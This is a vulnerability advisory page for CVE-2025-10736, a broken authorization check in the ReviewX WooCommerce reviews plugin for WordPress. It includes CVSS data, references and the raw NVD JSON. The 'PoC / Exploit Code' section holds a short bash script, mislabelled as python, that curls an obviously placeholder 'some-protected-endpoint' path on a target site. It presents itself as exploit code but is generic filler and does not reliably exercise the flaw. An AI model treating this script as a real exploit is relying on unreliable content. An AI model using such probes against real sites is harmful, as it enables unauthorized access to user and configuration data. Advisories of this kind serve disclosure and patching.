CVE-2025-10736

Description

The ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More plugin for WordPress is vulnerable to unauthorized access of data due to improper authorization checks on the userAccessibility() function in all versions up to, and including, 2.2.10. This makes it possible for unauthenticated attackers to access protected REST API endpoints, extract and modify information related to users and plugin's configuration

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ReviewX <= 2.2.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2025-10736 PoC - Unauthorized Access to ReviewX API
# Usage: ./poc.sh <target_url>

TARGET="$1"

if [ -z "$TARGET" ]; then
  echo "Usage: $0 <target_url>"
  exit 1
fi

echo "[+] Attempting to access protected endpoint..."

# Example endpoint to extract user data or config
curl -s -X GET "$TARGET/wp-json/reviewx/v1/some-protected-endpoint" \
     -H "User-Agent: CVE-2025-10736-Scanner" \
     -H "Accept: application/json"

echo "\n[+] Done."

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10736
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10736
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10736/
[4] VulDB https://vuldb.com/cve/CVE-2025-10736
[5] https://plugins.trac.wordpress.org/browser/reviewx/2.2.7/app/Rest/Middleware/AuthMiddleware.php#L41
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/505d7072-8fca-4b86-9b9c-3f39bc4dcfaf?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10736", "sourceIdentifier": "[email protected]", "published": "2026-03-23T05:16:04.823", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More plugin for WordPress is vulnerable to unauthorized access of data due to improper authorization checks on the userAccessibility() function in all versions up to, and including, 2.2.10. This makes it possible for unauthenticated attackers to access protected REST API endpoints, extract and modify information related to users and plugin's configuration"}, {"lang": "es", "value": "El plugin ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More para WordPress es vulnerable a acceso no autorizado a datos debido a controles de autorización inadecuados en la función userAccessibility() en todas las versiones hasta la 2.2.10, inclusive. Esto hace posible que atacantes no autenticados accedan a puntos finales de la API REST protegidos, extraigan y modifiquen información relacionada con los usuarios y la configuración del plugin."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/reviewx/2.2.7/app/Rest/Middleware/AuthMiddleware.php#L41", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/505d7072-8fca-4b86-9b9c-3f39bc4dcfaf?source=cve", "source": "[email protected]"}]}}